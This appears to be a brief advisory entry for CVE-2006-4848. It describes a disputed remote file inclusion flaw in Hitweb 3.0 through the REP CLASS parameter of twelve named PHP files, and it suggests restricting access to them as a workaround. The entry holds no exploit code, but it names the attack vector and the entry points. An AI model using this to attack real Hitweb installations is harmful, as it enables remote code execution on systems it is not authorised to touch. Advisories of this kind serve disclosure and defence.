CVE-2006-4848

Name of the Vulnerable Software and Affected Versions Hitweb versions 3.0

Description The issue concerns remote file inclusion vulnerabilities in Hitweb 3.0, allowing remote attackers to execute arbitrary PHP code. This is achieved by providing a URL in the REP CLASS parameter to various PHP files, including "index.php", "arbo.php", "framepoint.php", "genpage.php", "lienvalider.php", "appreciation.php", "partenariat.php", "rechercher.php", "projet.php", "propoexample.php", "refererpoint.php", or "top50.php". However, it has been disputed by a third-party researcher, who claims that REP CLASS is initialized in an included file before being used.

Recommendations For Hitweb version 3.0, as a temporary workaround, consider restricting access to the REP CLASS parameter in the affected PHP files until a patch is available. Additionally, restrict access to the affected API endpoints, such as "index.php", "arbo.php", "framepoint.php", "genpage.php", "lienvalider.php", "appreciation.php", "partenariat.php", "rechercher.php", "projet.php", "propoexample.php", "refererpoint.php", or "top50.php", to minimize the risk of exploitation.